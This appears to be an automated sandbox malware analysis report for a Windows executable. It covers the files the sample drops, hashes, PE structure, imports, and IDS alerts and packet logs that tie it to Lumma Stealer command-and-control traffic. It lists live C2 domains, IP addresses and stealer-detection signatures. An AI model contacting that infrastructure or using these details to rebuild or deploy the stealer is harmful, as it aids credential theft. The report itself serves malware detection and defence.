Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER90F1.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4565
Entropy (8bit):	4.446038168558606
Encrypted:	false
SSDEEP:	48:cvIwWl8zsBJg77aI9MayWpW8VYe0Ym8M4Jj9bcFjI+q8rxCRGzU3d:uIjfTI76W7VZJuInGzU3d
MD5:	7118F1757A6CDF5272EF0265BD91CDF8
SHA1:	E3F480AEDB8C8D0E6F5D0B0642933B3C41F2462D
SHA-256:	7D988311CAB1F7E221ED1EB68B2B7883DCDC3996443B8EF927C79091D572706B
SHA-512:	97317B30EF5BF60059823DB57241372B87D57ADDEC9B8F66F95838E6647E604A49C7540B458BC478929DFF3D29B2F9B693B72C6D0F02FD2F5CB6945C3E5324F1
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634941" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe

Download File

Process:	C:\Users\user\Desktop\DG55Gu1yGM.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	368640
Entropy (8bit):	6.6886130130371235
Encrypted:	false
SSDEEP:	6144:Qh4EPRjisApQk6co65oisFCB6EGSToOC03y6o+nLxQTwdbG:Qh4agH6c55AF6lGStCIy6DLx4wBG
MD5:	2C0A5976C7D6D86506EB825C8D67A8B8
SHA1:	55A8AD3D92A5A57F075DE40CC3A6391DBA279EC1
SHA-256:	580B4B31B7215EB5FFF2396E350607376DE72AFEF4B3A7E3D841E14081F5E9CB
SHA-512:	0B6EFBDD6DCA47D84D168A15C71014A4926D3215C3746E05008300680B2D784E7664C341E348061339469E32AD4036221C74EAD6ABE28C38616D4BF64364D113
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: he55PbvM2G.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.)..rGA.rGA.rGA.=.A.rGA. .A.rGA. .A.rGA. .AerGA,.<A.rGA.rFA}rGA. .A.rGA. .A.rGA. .A.rGARich.rGA........................PE..L...g.$f.....................&?.....w.............@.......................... C..............................................)..<.....B..............................................................................................................text............................... ..`.rdata...#.......$..................@..@.data.....=..@...p..."..............@....rsrc.........B.....................@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe

Download File

Process:	C:\Users\user\Desktop\DG55Gu1yGM.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	368640
Entropy (8bit):	6.6886130130371235
Encrypted:	false
SSDEEP:	6144:Qh4EPRjisApQk6co65oisFCB6EGSToOC03y6o+nLxQTwdbG:Qh4agH6c55AF6lGStCIy6DLx4wBG
MD5:	2C0A5976C7D6D86506EB825C8D67A8B8
SHA1:	55A8AD3D92A5A57F075DE40CC3A6391DBA279EC1
SHA-256:	580B4B31B7215EB5FFF2396E350607376DE72AFEF4B3A7E3D841E14081F5E9CB
SHA-512:	0B6EFBDD6DCA47D84D168A15C71014A4926D3215C3746E05008300680B2D784E7664C341E348061339469E32AD4036221C74EAD6ABE28C38616D4BF64364D113
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: he55PbvM2G.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.)..rGA.rGA.rGA.=.A.rGA. .A.rGA. .A.rGA. .AerGA,.<A.rGA.rFA}rGA. .A.rGA. .A.rGA. .A.rGARich.rGA........................PE..L...g.$f.....................&?.....w.............@.......................... C..............................................)..<.....B..............................................................................................................text............................... ..`.rdata...#.......$..................@..@.data.....=..@...p..."..............@....rsrc.........B.....................@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.42149183688115
Encrypted:	false
SSDEEP:	6144:6Svfpi6ceLP/9skLmb0OT6WSPHaJG8nAgeMZMMhA2fX4WABlEnNp0uhiTw:pvloT6W+EZMM6DFyD03w
MD5:	F2929EC7EA1D89E17391969CBE10536E
SHA1:	E8BDD4665EFF1FABB841B883AF5471A8619AD953
SHA-256:	5D17EA6B0EFA583CF94535B703B53B7C360566BF8C411A64A7BB22EF3533A882
SHA-512:	011F1849838EFA50ABC054BD1A07919AFEFDEAA7F27789D05D18B5B017A430C4F4FA571BBAD2F371E5487504AA2FC474482B2152F2FC183F795226DD06CC603E
Malicious:	false
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..5.SP..............................................................................................................................................................................................................................................................................................................................................c~".........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.477182771447748
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DG55Gu1yGM.exe
File size:	499'712 bytes
MD5:	f5f01c71d9ad196656cdceef7c1f12e6
SHA1:	962510bfb783205e77952ba732d64ef893270c54
SHA256:	2dda3c98fdc0a1a6cfeb495975c4ef006342388e1e9bcbbd2f11d323ac443090
SHA512:	499088adae2e389b38351163d17d4da1badd2f5cfb2e957ce5ce207948d241c911c78a6684b7a330ac3c3a8eecd4e418a23b65671fe50b01ba75e794a0af1695
SSDEEP:	6144:L+DODBpALP7DgUx8TCYtcYVyUEe89DQhtVaCa9Y/t4pb+8hUB9Wj/Akiy:KDkBpAz7D78jyU4svFb/ipq8JB
TLSH:	09B401123591C173D97556324465CA328E7BB8750BA949CB3FD8227C6F227E39F3234A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nKK..%...%...%..]....%..]....%..]..1.%...^...%...$.0.%..]....%..]....%..]....%.Rich..%.................PE..L...?W.e...........

File Icon


Icon Hash:	86c7c30b0f4e0d99

Static PE Info

General

Entrypoint:	0x40872b
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x65AD573F [Sun Jan 21 17:41:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	c00735f05d13fd7a2bf1a7281832b72f

Entrypoint Preview

Instruction
call 00007FD13D5208D7h
jmp 00007FD13D518AEEh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov eax, dword ptr [00471468h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
test byte ptr [00471144h], 00000001h
push esi
je 00007FD13D518C7Ah
push 0000000Ah
call 00007FD13D52019Bh
pop ecx
call 00007FD13D520991h
test eax, eax
je 00007FD13D518C7Ah
push 00000016h
call 00007FD13D520993h
pop ecx
test byte ptr [00471144h], 00000002h
je 00007FD13D518D40h
mov dword ptr [ebp-00000220h], eax
mov dword ptr [ebp-00000224h], ecx
mov dword ptr [ebp-00000228h], edx
mov dword ptr [ebp-0000022Ch], ebx
mov dword ptr [ebp-00000230h], esi
mov dword ptr [ebp-00000234h], edi
mov word ptr [ebp-00000208h], ss
mov word ptr [ebp-00000214h], cs
mov word ptr [ebp-00000238h], ds
mov word ptr [ebp-0000023Ch], es
mov word ptr [ebp-00000240h], fs
mov word ptr [ebp-00000244h], gs
pushfd
pop dword ptr [ebp-00000210h]
mov esi, dword ptr [ebp+04h]
lea eax, dword ptr [ebp+04h]
mov dword ptr [ebp-0000020Ch], eax
mov dword ptr [ebp-000002D0h], 00010001h
mov dword ptr [ebp-00000218h], esi
mov eax, dword ptr [eax-04h]
push 00000050h
mov dword ptr [ebp+000000E4h], eax

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[C++] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x70270	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7d000	0x39d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3800	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1b8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6fc7c	0x6fe00	1fbc71c570addf499060e8dc4d91979e	False	0.6716284043296089	data	6.687304967964323	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x71000	0xb1c8	0x6400	00919758a13f25cdfd697ebc308bf369	False	0.0913671875	data	1.2438718393385466	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x7d000	0x39d8	0x3a00	c19ee46954fdd092ac557da14145e07b	False	0.7629983836206896	data	6.461731778821008	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x7d1e0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	India	0.8076036866359447
RT_ICON	0x7d1e0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	Sri Lanka	0.8076036866359447
RT_ICON	0x7d8a8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Tamil	India	0.8048755186721992
RT_ICON	0x7d8a8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Tamil	Sri Lanka	0.8048755186721992
RT_ICON	0x7fe50	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Tamil	India	0.8625886524822695
RT_ICON	0x7fe50	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Tamil	Sri Lanka	0.8625886524822695
RT_STRING	0x80540	0x496	data	Tamil	India	0.4454855195911414
RT_STRING	0x80540	0x496	data	Tamil	Sri Lanka	0.4454855195911414
RT_ACCELERATOR	0x802e8	0x50	data	Tamil	India	0.825
RT_ACCELERATOR	0x802e8	0x50	data	Tamil	Sri Lanka	0.825
RT_GROUP_ICON	0x802b8	0x30	data	Tamil	India	0.9375
RT_GROUP_ICON	0x802b8	0x30	data	Tamil	Sri Lanka	0.9375
RT_VERSION	0x80338	0x208	data			0.5384615384615384

Imports

DLL

Import

KERNEL32.dll

GetComputerNameA, EnumCalendarInfoA, WriteConsoleInputW, TlsGetValue, SetComputerNameExA, InterlockedDecrement, GetCurrentProcess, GetLogicalDriveStringsW, InterlockedCompareExchange, WriteConsoleInputA, FreeEnvironmentStringsA, GetModuleHandleW, FindNextVolumeMountPointA, CancelDeviceWakeupRequest, EnumTimeFormatsA, LoadLibraryW, ReadConsoleInputA, GetCalendarInfoW, GetVersionExW, GetFileAttributesA, FindNextVolumeW, GetShortPathNameA, VerifyVersionInfoW, GetLastError, GetCurrentDirectoryW, SetLastError, GetProcAddress, VirtualAlloc, CreateJobSet, CopyFileA, SetFileAttributesA, GetTempFileNameA, GetAtomNameA, LoadLibraryA, InterlockedExchangeAdd, SetCalendarInfoW, OpenEventA, GetCommMask, EnumDateFormatsA, GlobalUnWire, GetDiskFreeSpaceExW, EnumCalendarInfoExA, LCMapStringW, GetVolumeInformationW, InterlockedIncrement, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, GetCPInfo, HeapAlloc, HeapCreate, VirtualFree, HeapReAlloc, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, ReadFile, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, SetFilePointer, CloseHandle, ExitProcess, WriteFile, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, GetStringTypeA, GetStringTypeW, InitializeCriticalSectionAndSpinCount, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetLocaleInfoW, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tamil	India
Tamil	Sri Lanka

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-17T08:18:42.268418+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49704	104.21.56.70	443	TCP
2024-12-17T08:18:43.839039+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49705	176.113.115.19	80	TCP
2024-12-17T08:18:48.082321+0100	2058226	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)	1	192.168.2.5	61916	1.1.1.1	53	UDP
2024-12-17T08:18:48.315792+0100	2058222	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)	1	192.168.2.5	63478	1.1.1.1	53	UDP
2024-12-17T08:18:49.777440+0100	2058223	ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)	1	192.168.2.5	49706	104.131.68.180	443	TCP
2024-12-17T08:18:49.777440+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49706	104.131.68.180	443	TCP
2024-12-17T08:18:49.781276+0100	2822521	ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)	1	104.131.68.180	443	192.168.2.5	49706	TCP
2024-12-17T08:18:50.284154+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49706	104.131.68.180	443	TCP
2024-12-17T08:18:50.284154+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49706	104.131.68.180	443	TCP
2024-12-17T08:18:50.289403+0100	2058214	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)	1	192.168.2.5	49702	1.1.1.1	53	UDP
2024-12-17T08:18:52.338976+0100	2058215	ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)	1	192.168.2.5	49708	45.77.249.79	443	TCP
2024-12-17T08:18:52.338976+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49708	45.77.249.79	443	TCP
2024-12-17T08:18:52.350433+0100	2822521	ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)	1	45.77.249.79	443	192.168.2.5	49708	TCP
2024-12-17T08:18:53.290018+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49708	45.77.249.79	443	TCP
2024-12-17T08:18:53.290018+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49708	45.77.249.79	443	TCP
2024-12-17T08:18:53.291662+0100	2058220	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)	1	192.168.2.5	51781	1.1.1.1	53	UDP
2024-12-17T08:18:53.516770+0100	2058218	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)	1	192.168.2.5	60957	1.1.1.1	53	UDP
2024-12-17T08:18:53.742917+0100	2058216	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)	1	192.168.2.5	51454	1.1.1.1	53	UDP
2024-12-17T08:18:54.053892+0100	2058236	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)	1	192.168.2.5	62073	1.1.1.1	53	UDP
2024-12-17T08:18:54.274547+0100	2058210	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)	1	192.168.2.5	55725	1.1.1.1	53	UDP
2024-12-17T08:18:54.498503+0100	2058226	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)	1	192.168.2.5	65226	1.1.1.1	53	UDP
2024-12-17T08:18:56.178703+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49715	104.121.10.34	443	TCP
2024-12-17T08:18:56.932913+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.5	49715	104.121.10.34	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 08:18:40.398171902 CET	49704	443	192.168.2.5	104.21.56.70
Dec 17, 2024 08:18:40.398221970 CET	443	49704	104.21.56.70	192.168.2.5
Dec 17, 2024 08:18:40.398339033 CET	49704	443	192.168.2.5	104.21.56.70
Dec 17, 2024 08:18:40.407941103 CET	49704	443	192.168.2.5	104.21.56.70
Dec 17, 2024 08:18:40.407973051 CET	443	49704	104.21.56.70	192.168.2.5
Dec 17, 2024 08:18:41.632982016 CET	443	49704	104.21.56.70	192.168.2.5
Dec 17, 2024 08:18:41.633152962 CET	49704	443	192.168.2.5	104.21.56.70
Dec 17, 2024 08:18:41.690980911 CET	49704	443	192.168.2.5	104.21.56.70
Dec 17, 2024 08:18:41.691016912 CET	443	49704	104.21.56.70	192.168.2.5
Dec 17, 2024 08:18:41.692040920 CET	443	49704	104.21.56.70	192.168.2.5
Dec 17, 2024 08:18:41.692122936 CET	49704	443	192.168.2.5	104.21.56.70
Dec 17, 2024 08:18:41.694613934 CET	49704	443	192.168.2.5	104.21.56.70
Dec 17, 2024 08:18:41.739334106 CET	443	49704	104.21.56.70	192.168.2.5
Dec 17, 2024 08:18:42.268513918 CET	443	49704	104.21.56.70	192.168.2.5
Dec 17, 2024 08:18:42.268649101 CET	49704	443	192.168.2.5	104.21.56.70
Dec 17, 2024 08:18:42.268678904 CET	443	49704	104.21.56.70	192.168.2.5
Dec 17, 2024 08:18:42.268731117 CET	49704	443	192.168.2.5	104.21.56.70
Dec 17, 2024 08:18:42.268738031 CET	443	49704	104.21.56.70	192.168.2.5
Dec 17, 2024 08:18:42.268785000 CET	49704	443	192.168.2.5	104.21.56.70
Dec 17, 2024 08:18:42.268806934 CET	443	49704	104.21.56.70	192.168.2.5
Dec 17, 2024 08:18:42.268845081 CET	49704	443	192.168.2.5	104.21.56.70
Dec 17, 2024 08:18:42.271369934 CET	49704	443	192.168.2.5	104.21.56.70
Dec 17, 2024 08:18:42.271394014 CET	443	49704	104.21.56.70	192.168.2.5
Dec 17, 2024 08:18:42.271408081 CET	49704	443	192.168.2.5	104.21.56.70
Dec 17, 2024 08:18:42.271450996 CET	49704	443	192.168.2.5	104.21.56.70
Dec 17, 2024 08:18:42.392240047 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:42.512226105 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:42.512346983 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:42.512564898 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:42.632345915 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:43.838874102 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:43.838948965 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:43.839030027 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:43.839039087 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:43.839039087 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:43.839088917 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:43.839153051 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:43.839165926 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:43.839200020 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:43.839215040 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:43.839231014 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:43.839241982 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:43.839261055 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:43.839267969 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:43.839272022 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:43.839282990 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:43.839288950 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:43.839332104 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:43.839371920 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:43.959095001 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:43.959184885 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:43.959273100 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:43.959273100 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:43.963133097 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:43.963188887 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:43.963198900 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:43.963232994 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.031382084 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.031399965 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.031536102 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.035422087 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.035485029 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.036808968 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.036859035 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.036891937 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.036931038 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.045285940 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.045300007 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.045361042 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.053689003 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.053751945 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.053872108 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.053920031 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.062063932 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.062125921 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.062185049 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.062230110 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.070482016 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.070549965 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.070584059 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.070625067 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.078958988 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.078985929 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.079070091 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.079102039 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.087384939 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.087399006 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.087469101 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.095792055 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.095855951 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.095871925 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.095922947 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.103399992 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.103477955 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.103662968 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.103705883 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.110825062 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.110889912 CET	49705	80	192.168.2.5	176.113.115.19
